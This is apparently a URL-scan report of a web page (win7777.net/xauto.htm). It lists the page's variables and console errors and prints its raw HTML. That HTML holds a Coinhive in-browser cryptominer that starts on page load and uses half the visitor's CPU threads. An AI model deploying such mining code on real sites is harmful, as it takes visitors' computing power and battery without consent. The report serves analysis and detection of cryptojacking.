https://win7777.net/xauto.htm

送信済みURL:
https://win7777.net/xauto.htm
レポート終了日:

リンク · 1件検出

ページから特定された発信リンク

リンクテキスト
https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policiesClick here for more information

JavaScript変数 · 5件検出

ページのウィンドウオブジェクトにロードされたグローバルのJavaScript変数は関数以外の場所で宣言された変数で、現在のスコープ内であればコードのどこからでもアクセス可能です

名前規模
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
cpuConfigobject
minerundefined

コンソールログメッセージ · 1件検出

Webコンソールにログ記録されたメッセージ

規模分類ログ
errornetwork
URL
https://win7777.net/favicon.ico
テキスト
Failed to load resource: the server responded with a status of 404 ()

HTML

未加工のHTMLページ本文

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=big5">
<title>auto</title>
<style>.js-modal{ position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); background-color: rgba(0, 0, 0, .8); width: 100%; height: 100%; z-index: 999999; } .js-modal-inner{ background-color: rgba(174, 145, 93, .9); position: relative; padding: 50px; font-size: 24px; max-width: 650px; top: 50%; left: 50%; transform: translate(-50%, -50%); color: #000; border-radius: 10px; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: normal; text-align: center; }  .js-modal-inner a { color: #000; text-decoration: underline; }</style></head>

<body>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<p style="font-size: 9pt;">
</p><p style="font-size: 11pt;" id="status"></p>
<p style="font-size: 11pt;" id="hashesPerSecond"></p>
<p style="font-size: 11pt;" id="getTotalHashes"></p>
<p style="font-size: 11pt;" id="stopped"></p>
<p id="minerbutton"></p>


<script>
if (navigator.hardwareConcurrency > 1){
	var cpuConfig = {threads: Math.round(navigator.hardwareConcurrency/2)}
}else{
	var cpuConfig = {throttle:0.3}
}
var miner = new CoinHive.Anonymous('gLjAsgvJJBUk5saTpdxnSiZsAmBGTJcZ', cpuConfig);
miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
// Update stats once per second
setInterval(function() {
	var threadCount = miner.getNumThreads();
	var hashesPerSecond = Math.round(miner.getHashesPerSecond());
	var getTotalHashes = miner.getTotalHashes();
try {
	navigator.getBattery().then(function (battery) {
		if (battery.level < 0.50 && battery.charging == false) {
			miner.stop();
			document.getElementById("stopped").innerHTML = "偵測到電量不足已停止運算";
		}
	});
}catch(e){console.log(e)}
	// Output to HTML elements...
	if (miner.isRunning()) {
		document.getElementById("status").innerHTML = "狀態: 正在使用 " + threadCount + " 個執行緒";
		document.getElementById("hashesPerSecond").innerHTML = "轉換率: " + hashesPerSecond + " H/s";
		document.getElementById("getTotalHashes").innerHTML = "已轉換: " + getTotalHashes + " 次Hash";
		document.getElementById("minerbutton").innerHTML = "<button onclick=\"miner.stop()\">STOP</button>";
	}else{
		document.getElementById("status").innerHTML = "狀態: 沒有在進行運算";
		document.getElementById("hashesPerSecond").innerHTML = "您的算力: " + 0 + " H/s";
		document.getElementById("minerbutton").innerHTML = "<button onclick=\"miner.start(CoinHive.FORCE_EXCLUSIVE_TAB)\">開始</button>";
	}
}, 800);
</script>



<div class="js-modal"><div class="js-modal-inner">This website attempted to run a cryptominer in your browser. <a href="https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies">Click here for more information</a>.</div></div></body></html>